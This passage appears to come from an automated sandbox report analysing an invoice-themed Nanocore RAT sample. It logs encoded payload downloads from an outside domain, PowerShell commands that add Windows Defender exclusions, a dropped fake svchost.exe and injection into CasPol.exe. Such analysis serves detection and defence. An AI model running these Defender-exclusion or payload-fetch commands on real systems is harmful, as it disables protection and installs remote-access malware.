                                                                                                Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LWLEkCU6JedlIVetYp%2BI5Fb8q0flq9uaqxxi6SW%2BeKwP7%2BbD%2FA4lZzYvmBsndSyoQlZFqKFSgjM66pVut1oCFG%2Bbt7lYlLOq8jZDpJHmf3WJ%2BNoQ"}]}
                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 62721cae9bfb733b-AMS
                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                Data Raw: 37 63 37 62 0d 0a 3c 70 3e 47 47 59 4e 69 59 65 7a 7a 59 69 59 54 59 69 59 69 59 69 59 7a 59 69 59 69 59 69 59 44 79 79 59 44 79 79 59 69 59 69 59 65 51 7a 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 4c 7a 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 65 44 51 59 69 59 69 59 69 59 65 7a 59 54 65 59 65 51 4c 59 65 7a 59 69 59 65 51 69 59 4e 59 44 69 79 59 54 54 59 65 51 7a 59 65 59 47 4c 59 44 69 79 59 54 54 59 51 7a 59 65 69 7a 59 65 69 79 59 65 65 79 59 54 44 59 65 65 44 59 65 65 7a 59 65 65 65 59 65 69 54 59 65 65 7a 59 4e 47 59 65 69 4e 59 54 44 59 4e 4e 59 4e 47 59 65 65 69 59 65 65 69 59 65 65 65 59 65 65 4c 59 54 44 59 4e 51 59 65 69 65 59 54 44 59 65 65 7a 59 65 65 47 59 65 65 69 59 54 44 59 65 69 79 59 65 65 69 59 54 44 59 4c 51 59 47 4e 59 51 54 59 54 44 59 65 69 4e 59 65 65 65 59 65 69 69 59 65 69 65 59 7a 4c 59 65 54 59 65 54 59 65 69 59 54 4c 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 51 69 59 4c 4e 59 69 59 69 59 47 4c 59 65 59 54 59 69 59 47 4c 59 65 7a 44 59 7a 65 59 65 51 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 44 44 7a 59 69 59 54 7a 59 69 59 65 65 59 65 59 51 69 59 69 59 69 59 51 51 59 65 69 59 69 59 69 59 4c 59 69 59 69 59 69 59 69 59 69
                                                                                                Data Ascii: 7c7b<p>GGYNiYezzYiYTYiYiYiYzYiYiYiYDyyYDyyYiYiYeQzYiYiYiYiYiYiYiYLzYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYeDQYiYiYiYezYTeYeQLYezYiYeQiYNYDiyYTTYeQzYeYGLYDiyYTTYQzYeizYeiyYeeyYTDYeeDYeezYeeeYeiTYeezYNGYeiNYTDYNNYNGYeeiYeeiYeeeYeeLYTDYNQYeieYTDYeezYeeGYeeiYTDYeiyYeeiYTDYLQYGNYQTYTDYeiNYeeeYeiiYeieYzLYeTYeTYeiYTLYiYiYiYiYiYiYiYQiYLNYiYiYGLYeYTYiYGLYezDYzeYeQiYiYiYiYiYiYiYiYiYDDzYiYTzYiYeeYeYQiYiYiYQQYeiYiYiYLYiYiYiYiYi
                                                                                                Feb 25, 2021 15:28:18.869798899 CET5390OUTGET /base/D8145E38A6AEE16C4C80E6936C9A6886.html HTTP/1.1
                                                                                                Host: coroloboxorozor.com
                                                                                                Feb 25, 2021 15:28:18.935168982 CET5392INHTTP/1.1 200 OK
                                                                                                Date: Thu, 25 Feb 2021 14:28:18 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: __cfduid=db1090b58def6d6c36e4322e395959ae21614263298; expires=Sat, 27-Mar-21 14:28:18 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                Last-Modified: Thu, 25 Feb 2021 01:03:13 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                cf-request-id: 087b3043580000733b2e9ee000000001
                                                                                                Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=BFmMYerzwWnc%2BwW0DYGBGPXvHcH%2FtB6D%2FPH6ATW%2Bjvs2gBJB7tn%2Ft5a5I9KEJH9jhz%2FicW18OoFsUY5Z8KO5vqn%2BOA%2FPaYeYXEcFMoic5RqDPiJy"}]}
                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 62721cb22d3f733b-AMS
                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                Data Raw: 34 64 66 39 0d 0a 3c 70 3e 59 65 4c 4e 59 44 54 54 59 4e 7a 59 44 4e 59 65 54 69 59 65 69 59 44 44 7a 59 44 69 54 59 4e 4e 59 79 54 59 65 54 4c 59 65 47 79 59 65 44 54 59 51 69 59 65 44 51 59 44 65 7a 59 65 4e 65 59 44 7a 4e 59 44 79 7a 59 65 4c 47 59 79 69 59 79 7a 59 65 7a 69 59 44 47 59 44 44 4e 59 47 47 59 65 79 47 59 44 65 79 59 65 69 51 59 65 54 4c 59 44 65 65 59 65 65 69 59 44 7a 47 59 47 65 59 7a 65 59 44 54 79 59 7a 7a 59 65 7a 47 59 65 54 47 59 65 51 47 59 51 7a 59 65 65 4c 59 47 4c 59 65 7a 44 59 51 4c 59 47 79 59 65 79 69 59 47 51 59 65 7a 4c 59 51 54 59 44 7a 69 59 69 59 65 69 65 59 51 51 59 65 4c 4c 59 69 59 65 7a 4e 59 4e 7a 59 51 54 59 65 79 47 59 7a 79 59 65 4e 69 59 65 4e 79 59 65 59 44 54 51 59 44 7a 44 59 7a 4c 59 65 4c 69 59 65 54 69 59 54 79 59 44 44 44 59 65 4c 44 59 65 69 69 59 65 44 51 59 44 7a 79 59 47 54 59 44 44 59 44 44 44 59 65 54 4e 59 65 47 69 59 4c 7a 59 65 7a 54 59 65 4c 51 59 44 69 47 59 44 65 65 59 44 7a 4c 59 65 65 69 59 65 79 44 59 44 7a 54 59 44 44 4e 59 54 79 59 65 44 79 59 47 4e 59 47 69 59 44 69 4c 59 47 44 59 54 54 59 65 44 59 65 51 54 59 47 4e 59 65 4c 79 59 65 44 79 59 79 65 59 65 4e 4c 59 44 69 69 59 65 47 79 59 65 51 47 59 65 65 69 59 65 47 65 59 51 69 59 7a 54 59 65 47 79 59 65 47 59 65 7a 51 59 65 79 65 59 47 4c 59 54 4c 59 79 69 59 44 69 44 59 4e 54 59 65 4e 54 59 51 7a 59 65
                                                                                                Data Ascii: 4df9<p>YeLNYDTTYNzYDNYeTiYeiYDDzYDiTYNNYyTYeTLYeGyYeDTYQiYeDQYDezYeNeYDzNYDyzYeLGYyiYyzYeziYDGYDDNYGGYeyGYDeyYeiQYeTLYDeeYeeiYDzGYGeYzeYDTyYzzYezGYeTGYeQGYQzYeeLYGLYezDYQLYGyYeyiYGQYezLYQTYDziYiYeieYQQYeLLYiYezNYNzYQTYeyGYzyYeNiYeNyYeYDTQYDzDYzLYeLiYeTiYTyYDDDYeLDYeiiYeDQYDzyYGTYDDYDDDYeTNYeGiYLzYezTYeLQYDiGYDeeYDzLYeeiYeyDYDzTYDDNYTyYeDyYGNYGiYDiLYGDYTTYeDYeQTYGNYeLyYeDyYyeYeNLYDiiYeGyYeQGYeeiYeGeYQiYzTYeGyYeGYezQYeyeYGLYTLYyiYDiDYNTYeNTYQzYe


                                                                                                Code Manipulations

                                                                                                Statistics

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Start time:15:25:52
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe'
                                                                                                Imagebase:0xf70000
                                                                                                File size:341280 bytes
                                                                                                MD5 hash:6ECB42A8B14658CD4EE39D5E09B103F5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                Reputation:low

                                                                                                General

                                                                                                Start time:15:27:46
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' -Force
                                                                                                Imagebase:0x11e0000
                                                                                                File size:430592 bytes
                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:27:46
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6b2800000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:27:47
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                Imagebase:0x400000
                                                                                                File size:91000 bytes
                                                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 3%, Metadefender, Browse
                                                                                                • Detection: 0%, ReversingLabs
                                                                                                Reputation:moderate

                                                                                                General

                                                                                                Start time:15:27:49
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe' /SpecialRun 4101d8 4716
                                                                                                Imagebase:0x400000
                                                                                                File size:91000 bytes
                                                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                General

                                                                                                Start time:15:27:55
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
                                                                                                Imagebase:0x11e0000
                                                                                                File size:430592 bytes
                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:27:55
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6b2800000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:27:55
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                                Imagebase:0x7ff6741d0000
                                                                                                File size:232960 bytes
                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:27:56
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6b2800000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:27:56
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:timeout 1
                                                                                                Imagebase:0x8d0000
                                                                                                File size:26112 bytes
                                                                                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:27:58
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe'
                                                                                                Imagebase:0x7ff714890000
                                                                                                File size:3933184 bytes
                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:28:00
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                Imagebase:0x7ff714890000
                                                                                                File size:3933184 bytes
                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:28:01
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Users\Public\Documents\RiXHGNhjF\svchost.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe'
                                                                                                Imagebase:0x960000
                                                                                                File size:341280 bytes
                                                                                                MD5 hash:6ECB42A8B14658CD4EE39D5E09B103F5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 38%, ReversingLabs

                                                                                                General

                                                                                                Start time:15:28:01
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                                                                                                Imagebase:0x7ff78fb30000
                                                                                                File size:107624 bytes
                                                                                                MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:28:01
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                                                                                                Imagebase:0xc0000
                                                                                                File size:107624 bytes
                                                                                                MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:28:02
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                                                                                                Imagebase:0xc0000
                                                                                                File size:107624 bytes
                                                                                                MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:28:02
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                                                                                                Imagebase:0x120000
                                                                                                File size:107624 bytes
                                                                                                MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:28:03
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                                                                                                Imagebase:0x750000
                                                                                                File size:107624 bytes
                                                                                                MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.1641837580.00000000052A0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.1641837580.00000000052A0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.1639236864.0000000003DF9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: NanoCore, Description: unknown, Source: 00000012.00000002.1639236864.0000000003DF9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.1643028705.0000000005540000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.1643028705.0000000005540000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.1643028705.0000000005540000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.1611766300.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.1611766300.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: NanoCore, Description: unknown, Source: 00000012.00000002.1611766300.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                                                                                                General

                                                                                                Start time:15:28:05
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                Imagebase:0x7ff7488e0000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:28:05
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3236 -ip 3236
                                                                                                Imagebase:0x12f0000
                                                                                                File size:434592 bytes
                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:28:06
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe'
                                                                                                Imagebase:0x7ff714890000
                                                                                                File size:3933184 bytes
                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:28:07
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 2232
                                                                                                Imagebase:0x12f0000
                                                                                                File size:434592 bytes
                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                General

                                                                                                Start time:15:28:08
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                Imagebase:0x7ff714890000
                                                                                                File size:3933184 bytes
                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:28:10
                                                                                                Start date:25/02/2021
                                                                                                Path:C:\Users\Public\Documents\RiXHGNhjF\svchost.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe'
                                                                                                Imagebase:0x4b0000
                                                                                                File size:341280 bytes
                                                                                                MD5 hash:6ECB42A8B14658CD4EE39D5E09B103F5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                Disassembly

                                                                                                Code Analysis

                                                                                                Reset < >